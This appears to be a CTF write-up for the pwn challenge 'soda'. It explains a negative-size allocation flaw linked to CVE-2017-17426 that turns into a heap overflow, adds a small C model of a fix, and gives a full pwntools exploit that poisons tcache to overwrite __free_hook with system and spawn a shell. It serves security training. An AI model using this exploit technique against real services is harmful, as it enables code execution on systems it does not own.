[Mid-Autumn Festival] Open Competition Writeup | Pwn-soda

Category: CTF

Topics covered:

  • CVE-2017-17426

  • tcache bin attack

Solution:

First, the program does not check the sign of size when allocating a chunk. Via CVE-2017-17426 (the glibc version is 2.26), a negative size causes a chunk to be taken from tcache; and because size is converted to an unsigned integer when the content is read, this yields a heap overflow. What follows is the standard heap-overflow exploitation: create overlapping chunks, then use a tcache attack to hijack free_hook to system, and free a chunk containing "/bin/sh\x00" to get a shell.
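As an added illustration (not the challenge's own source, which the page does not reproduce), the following C model shows the signed/unsigned size confusion the writeup relies on and the check that closes it; struct note, as_unsigned, note_alloc, checked_len and note_write are constructed names.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the pattern the writeup describes: the program keeps
 * the user-supplied size as a signed int and later reads that many bytes
 * into the chunk, converting the value to size_t on the way. */
struct note {
    char  *buf;
    size_t cap;   /* bytes actually allocated for buf */
};

/* What a negative signed size becomes once it reaches a size_t parameter
 * such as the length argument of read(): -1 turns into SIZE_MAX. */
size_t as_unsigned(int size) {
    return (size_t)size;
}

/* Allocation with the sign check the challenge binary omitted. */
int note_alloc(struct note *n, int requested) {
    if (requested <= 0) return -1;
    n->buf = malloc((size_t)requested);
    if (n->buf == NULL) return -1;
    n->cap = (size_t)requested;
    return 0;
}

/* Hardened length check: reject negative values before any conversion to
 * unsigned, then reject anything larger than the chunk really holds.
 * Returns 0 and stores the validated length, or -1 on rejection. */
int checked_len(int requested, size_t cap, size_t *out) {
    if (requested < 0) return -1;
    if ((size_t)requested > cap) return -1;
    *out = (size_t)requested;
    return 0;
}

/* Copies data into the note only after checked_len accepts the length, so a
 * request of -1 can no longer turn into a SIZE_MAX-byte write. */
int note_write(struct note *n, int requested, const char *data) {
    size_t len;
    if (checked_len(requested, n->cap, &len) != 0) return -1;
    memcpy(n->buf, data, len);
    return 0;
}
```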

The exploit follows:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *

context.log_level = 'debug'
binary = './soda'
elf = ELF('./soda')
libc = ELF("./libc.so.6")
context.binary = binary

DEBUG = 0
if DEBUG:
    p = process(binary)
    # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
    host = "127.0.0.1"
    port = 9999
    p = remote(host,port)
if DEBUG == 2:
    host = ""
    port = 0
    user = ""
    passwd = ""
    p = ssh(host,port,user,passwd)

# I/O helpers
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))

# Menu wrappers for the challenge binary
def cmd(idx):
    sla(">> ",str(idx))

def add(size,payload):
    cmd(1)
    sla(":\n",str(size))
    sa(":\n",payload)

def free(idx):
    cmd(2)
    sla(":\n",str(idx))

def free1(idx):
    cmd(2)
    sla(":",str(idx))

def add1(size,payload):
    cmd(1)
    sla(":",str(size))
    sa(":",payload)

def exp():
    add(0x18,"aaaa")
    add(0xff,'aaaa')
    free(1)
    add(0xf0,"aaaa")
    free(1)
    add(0xe0,"aaaa")
    free(1)
    add(0xd0,'aaaa')
    free(1)
    add(0xc0,"aaaa")
    free(1)
    add(0xb0,"aaaa")
    free(1)
    free(0)
    add(0xff,"aaa")
    # chunk overflow: negative size (CVE-2017-17426), read as unsigned
    add(str(-1),"a"*0x18+p64(0x4b1))
    free(0)
    add(0xff,"aaa")
    add(0x38,p16(0x2720))
    # gdb.attach(p)
    free(1)
    add(0xf0,"aaa")
    # leak libc_base
    add(0xf0,p64(0xfbad1800)+p64(0)*3+p8(0x88))
    libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
    lg("libc_base",libc_base)
    # tcache attack
    free1(0)
    free1(1)
    free1(2)
    add1(0x38,p64(libc_base+libc.sym["__free_hook"]))
    add1(0x38,"/bin/sh\x00")
    add1(0x38,p64(libc_base+libc.sym["system"]))
    free1(1)
    p.sendline("cat flag")
    p.interactive()

# Retry until the partial overwrite lands
while True:
    p = remote(host,port)
    try:
        exp()
    except:
        p.close()
```






This article was first published on the WeChat official account (胖哈勃): [Mid-Autumn Festival] Open Competition Writeup | Pwn-soda
